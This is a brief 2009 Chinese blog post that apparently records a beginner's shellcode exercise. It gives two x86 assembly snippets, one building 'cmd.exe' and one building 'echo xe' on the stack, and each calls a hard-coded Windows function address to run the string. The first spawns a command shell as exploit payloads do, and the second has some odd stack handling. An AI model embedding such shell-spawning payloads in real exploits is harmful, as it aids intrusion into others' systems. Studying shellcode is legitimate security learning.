2009年3月21日

ShellCode

两组对应的ASM代码。

ASM1:

push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov [ebp-08h],63h
mov [ebp-07h],6Dh
mov [ebp-06h],64h
mov [ebp-05h],2Eh
mov [ebp-04h],65h
mov [ebp-03h],78h
mov [ebp-02h],65h
lea eax,[ebp-08h]
push eax
mov edx,0x77bf93c7
call edx
leave //==mov esp,ebp + pop ebp

ASM2:
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],'e'
mov byte ptr [ebp-07h],'c'
mov byte ptr [ebp-06h],'h'
mov byte ptr [ebp-05h],'o'
mov byte ptr [ebp-04h],' '
mov byte ptr [ebp-03h],'x'
mov byte ptr [ebp-02h],'e'
lea eax,[ebp-08h]
push eax
mov eax,0x77bf93c7
call eax
add esp,5ch
pop ebp

Posted By zerosoul Time: 08:13

没有评论:

发表评论

订阅: 博文评论 (Atom)